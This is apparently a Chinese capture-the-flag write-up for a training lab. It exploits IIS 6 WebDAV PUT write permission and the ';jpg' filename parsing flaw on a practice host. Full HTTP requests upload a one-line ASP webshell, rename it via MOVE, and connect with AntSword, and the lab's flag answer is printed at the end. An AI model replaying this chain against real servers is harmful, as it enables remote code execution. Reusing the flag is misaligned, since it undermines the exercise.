墨者学院一道题目-IIS写权限漏洞分析溯源 题目链接
知识点: 1.iis put写权限漏洞 2.iis6文件名解析漏洞
工具: burpsuite AntswordAntSword-Loader
IP地址 : 219.153.49.228 端口 : 48336 协议 : http 其他 : [点击访问]
1.直接访问靶场,并使用burpsuite抓包 http://219.153.49.228:48336 显示页面:
原始包:
2.利用iis写权限漏洞 使用PUT上传文件txt 用OPTIONS,观察返回,Allow存在PUT 请求包:
代码语言:javascript复制OPTIONS / HTTP/1.1
Host: 219.153.49.228:48336
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cacheOPTIONS
响应包:
代码语言:javascript复制HTTP/1.1 200 OK
Connection: close
Date: Mon, 19 Oct 2020 07:41:00 GMT
Server: Microsoft-IIS/6.0
MS-Author-Via: DAV
Content-Length: 0
Accept-Ranges: none
DASL: <DAV:sql>
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
Cache-Control: private
利用iisput写权限漏洞
代码语言:javascript复制PUT /a.txt HTTP/1.1
Host: 219.153.49.228:48336
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 24
<%exECuTe ReqUEst(0)%>
代码语言:javascript复制HTTP/1.1 201 Created
Connection: close
Date: Mon, 19 Oct 2020 07:35:54 GMT
Server: Microsoft-IIS/6.0
Location: http://219.153.49.228/a.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK
成功写入
3.MOVE修改文件名(利用iis解析漏洞)
Destination:/222.asp;jpg
代码语言:javascript复制MOVE /a.txt HTTP/1.1
Host: 219.153.49.228:48336
Destination:/222.asp;jpg
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 2
代码语言:javascript复制HTTP/1.1 207 Multi-Status
Connection: close
Date: Mon, 19 Oct 2020 07:37:17 GMT
Server: Microsoft-IIS/6.0
Location: http://219.153.49.228/222.asp;jpg
Content-Type: text/xml
Content-Length: 182
<?xml version="1.0"?><a:multistatus xmlns:a="DAV:"><a:response><a:href>http://219.153.49.228/a.txt</a:href><a:status>HTTP/1.1 401 Unauthorized</a:status></a:response></a:multistatus>
4.使用Antsword链接 http://219.153.49.228:48336/222.asp;jpg 0
代码语言:javascript复制/*
mozhe4a24a1cb68810f620c473728805
*/